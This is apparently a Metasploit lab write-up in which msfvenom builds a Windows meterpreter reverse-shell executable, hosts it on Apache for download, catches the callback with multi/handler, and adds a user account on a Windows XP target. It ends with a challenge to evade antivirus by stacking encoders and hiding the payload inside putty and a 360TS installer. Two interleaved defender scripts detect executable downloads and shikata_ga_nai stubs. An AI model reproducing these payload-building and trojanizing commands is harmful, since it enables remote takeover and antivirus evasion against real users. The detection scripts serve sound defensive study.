# DIY Virus

### Environment

* Attacked server (target):
  * OS: Windows XP
  * IP: 192.168.43.130
* Attack server:
  * OS: Kali Linux 5.15.0
  * IP: 192.168.43.132
* Tools: Metasploit
* Virus test site: https://www.virustotal.com/gui/home/upload

## Solution

* Use msfvenom to build various payloads.
* Deploy the payloads to the web server.

## Check the network

* Check that both servers are connected to the same LAN.
* Use the `ping` command to check.

![](https://i.imgur.com/H53UlX0.png)

* Make sure the attack server can reach the internet; this is needed once the virus has been built.

![](https://i.imgur.com/E8p7uKb.png)

## Using msfvenom

* Before using this tool, we must have the following information:
  * Which OS we are attacking (Windows, Linux, macOS, etc.).
  * How we are attacking. In this case, we use a web site to deliver the payload.
  * The IP of the attacked server.
  * Where to deploy the virus.
* Since we attack through the web, we build the virus inside the apache2 web root.
* Command to build the virus:

```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f exe > /var/www/html/cmds.exe
```

* Options:
  * `-p`: payload.
  * `-f`: output format (`exe` here).
  * `reverse_tcp`: the target connects back to us, so we do not need to know its IP and no extra inbound firewall rule is needed.
  * `windows` can be changed to another platform: Android, Unix, Linux, etc.
  * `LHOST`: local host (the attack server).
  * `RHOST`/`RPORT`: the attacked host/port.
* Success message:

```sh
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
```

* Check the virus file:

```sh
ls /var/www/html/
```

![](https://i.imgur.com/5XHydjy.png)

## Deploy

We deploy the virus through the apache2 service, so apache2 must be restarted; then check the URL to download it.
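The deploy step above serves `cmds.exe` straight from the apache2 web root, which means every fetch of it lands in the server's access log. As an added defender-side example (not code from the original write-up), the script below parses access-log lines in Apache's default common format and flags successfully served executable downloads; the log lines are constructed for the example and mirror this lab's addresses.

```python
import re
from typing import Dict, List, Optional

# Apache "common" log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Extensions that should rarely be served from a plain static web root.
EXEC_EXTENSIONS = (".exe", ".dll", ".scr", ".ps1", ".bat", ".hta", ".msi")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access-log line into a dict, or None when it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_executable_downloads(lines: List[str]) -> List[Dict[str, str]]:
    """Return successfully served (2xx) GET requests for executable files."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] != "GET" or not rec["status"].startswith("2"):
            continue
        path = rec["path"].split("?", 1)[0].lower()   # ignore any query string
        if path.endswith(EXEC_EXTENSIONS):
            hits.append({"client": rec["client"], "path": rec["path"],
                         "time": rec["time"], "size": rec["size"]})
    return hits


# Constructed sample lines: the XP host (192.168.43.130) browsing the Kali
# web root and then fetching cmds.exe; the date is made up for the example.
SAMPLE_LOG = [
    '192.168.43.130 - - [10/Mar/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 3460',
    '192.168.43.130 - - [10/Mar/2023:10:01:30 +0000] "GET /cmds.exe HTTP/1.1" 200 73802',
    '192.168.43.130 - - [10/Mar/2023:10:01:31 +0000] "GET /favicon.ico HTTP/1.1" 404 209',
    '192.168.43.130 - - [10/Mar/2023:10:02:00 +0000] "GET /putty2.exe HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for hit in find_executable_downloads(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} downloaded {hit['path']} ({hit['size']} bytes)")
```

The 404 for `putty2.exe` is deliberately left out of the result: only files that were actually delivered matter for triage, although repeated 404s for executables from one client are worth a second look.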
* Restart the apache2 service:

```sh
service apache2 restart
```

* Check that the service is working:

```sh
service apache2 status
```

![](https://i.imgur.com/mZBxsr5.png)

## Msfconsole

Metasploit is a project built by Rapid7 for penetration testing. Msfconsole is Metasploit's command line interface. [Armitage](https://github.com/rsmudge/armitage) is a GUI for Metasploit, built in Java. In this case we use msfconsole to build a handler that accepts the connection from the attacked server.

* Open Metasploit's msfconsole:

```sh
msfconsole
```

![](https://i.imgur.com/5xaHIjj.png)

* Create a handler:

```sh
use exploit/multi/handler
```

* Set the payload:

```sh
set payload windows/meterpreter/reverse_tcp
```

* Set lhost:

```sh
set lhost 192.168.43.132
```

* Set lport:

```sh
set lport 7749
```

* Start the handler:

```sh
run
```

* Setup succeeded:

![](https://i.imgur.com/XzFB1Jn.png)

## Download the virus on Windows and test it

* Open a browser on Windows.
* Open the attack server's web page using the attack server IP.

![](https://i.imgur.com/MHPpQxF.png)

* Append the file name `cmds.exe` to the end of the URL to download the virus.

![](https://i.imgur.com/SN8158y.png)

* Back on Kali Linux, check the msfconsole status. When the virus runs successfully, msfconsole switches to a meterpreter prompt that controls the attacked server.

![](https://i.imgur.com/ALk0rxe.png)

## Control the attacked server

This is a simple demonstration of controlling the attacked server: adding a user.

* Check all the users before the attack. There is no user called jack, so I'll add a user called jack.

![](https://i.imgur.com/JQrPFs0.png)

* Open a command shell first:

```sh
shell
```

![](https://i.imgur.com/jjKCHk2.png)

* Use the following command to add the jack account and set its password to 123456:

![](https://i.imgur.com/N9ZwvKo.png)

```sh
net user /add jack 123456
```

* Back on the attacked server, there is a new jack account.

![](https://i.imgur.com/1cbmUTb.png)

## Challenge: get a VirusTotal score

* Use VirusTotal to get the detection score of your virus, cmds.exe.
![](https://i.imgur.com/370Espk.png)

* Try another encoder:

```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=12345 -e x86/shikata_ga_nai -i 9 -f raw -b "\x00" > eoncodex.exe
```

![](https://i.imgur.com/8SrtZQo.png)

* Try building from another exe file; in this case 360TS:

```sh
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.43.132 LPORT=7749 -f raw \
  | msfvenom -a x86 --platform windows -e ruby/base64 -i 10 -f raw \
  | msfvenom -a x86 --platform windows -e cmd/echo -i 10 -x 360TS_Setup_Mini.exe -f exe > 360Installer.exe
```

![](https://i.imgur.com/PV9lGwt.png)

* Try building from another exe file; in this case putty:

```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f raw -e x86/shikata_ga_nai -i 9 \
  | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw \
  | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw \
  | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw \
  | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -x putty.exe -o putty2.exe
```

![](https://i.imgur.com/hSapxBn.png)

## Reference

* https://github.com/TideSec/BypassAntiVirus
* https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/
* https://github.com/cyberteach360/msfvenom
* https://www.golinuxcloud.com/inject-encoded-payload-shellter/
* https://www.iswatlab.eu/wp-content/uploads/2017/01/Technical_Report_Evasion.pdf
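The encoder challenge above leans on `x86/shikata_ga_nai`, and the VirusTotal score shows why stacking iterations of it gains little: the encoder randomises registers and keys, but its decoder stub always needs the `fnstenv [esp-0xc]` GetPC trick (bytes `D9 74 24 F4`), a counter loaded into `ecx`, and a backward `loop` that drives the XOR decode. As an added defender-side example (not code from the write-up or from Metasploit), the scanner below flags that combination in a byte buffer; the sample buffers are constructed for the example and are not real payloads.

```python
from typing import List

# Opcode bytes that stay fixed across shikata_ga_nai's randomised stubs.
FNSTENV_ESP = b"\xd9\x74\x24\xf4"   # fnstenv [esp-0xc]: stores the last FPU insn's EIP
LOOP_OPCODE = 0xE2                    # loop rel8: runs the XOR decode block
ECX_SETUP = (b"\x31\xc9", b"\x33\xc9", b"\x66\xb9", b"\xb1")  # xor ecx,ecx / mov cx / mov cl
WINDOW = 48                           # bytes after fnstenv in which the loop must appear


def find_shikata_stubs(data: bytes) -> List[int]:
    """Return offsets of fnstenv sequences that look like a shikata decoder stub."""
    hits = []
    start = 0
    while True:
        off = data.find(FNSTENV_ESP, start)
        if off == -1:
            break
        start = off + 1
        tail = data[off + len(FNSTENV_ESP): off + len(FNSTENV_ESP) + WINDOW]
        # A decode loop jumps backwards, so the rel8 operand must be negative.
        has_loop = any(tail[i] == LOOP_OPCODE and tail[i + 1] >= 0x80
                       for i in range(len(tail) - 1))
        near = data[max(0, off - 16): off + len(FNSTENV_ESP) + WINDOW]
        has_counter = any(sig in near for sig in ECX_SETUP)
        if has_loop and has_counter:   # plain fnstenv alone is too common to flag
            hits.append(off)
    return hits


# Constructed stand-in for an encoded blob: padding, then a stub shaped like
# shikata's (fldz; fnstenv; pop ebx; xor ecx,ecx; mov cl,N; xor [ebx+off],eax;
# add eax,[ebx+off]; sub ebx,-4; loop), then filler for the "encoded" body.
ENCODED_SAMPLE = (
    b"\x90" * 8
    + b"\xd9\xee" + FNSTENV_ESP + b"\x5b"
    + b"\x31\xc9" + b"\xb1\x0b"
    + b"\x31\x43\x14" + b"\x03\x43\x14" + b"\x83\xeb\xfc" + b"\xe2\xf4"
    + bytes(range(0x20, 0x50))
)

# Constructed benign buffer: a function that uses fnstenv but has no decode loop.
CLEAN_SAMPLE = b"\x55\x8b\xec" + FNSTENV_ESP + b"\x8b\x45\x08\xc9\xc3" + b"\x00" * 64

if __name__ == "__main__":
    for name, blob in (("encoded", ENCODED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, "stub offsets:", find_shikata_stubs(blob))
```

A hit is a lead for analysis rather than a verdict: legitimate FPU code also emits `fnstenv`, which is why the loop and counter checks are required before flagging an offset.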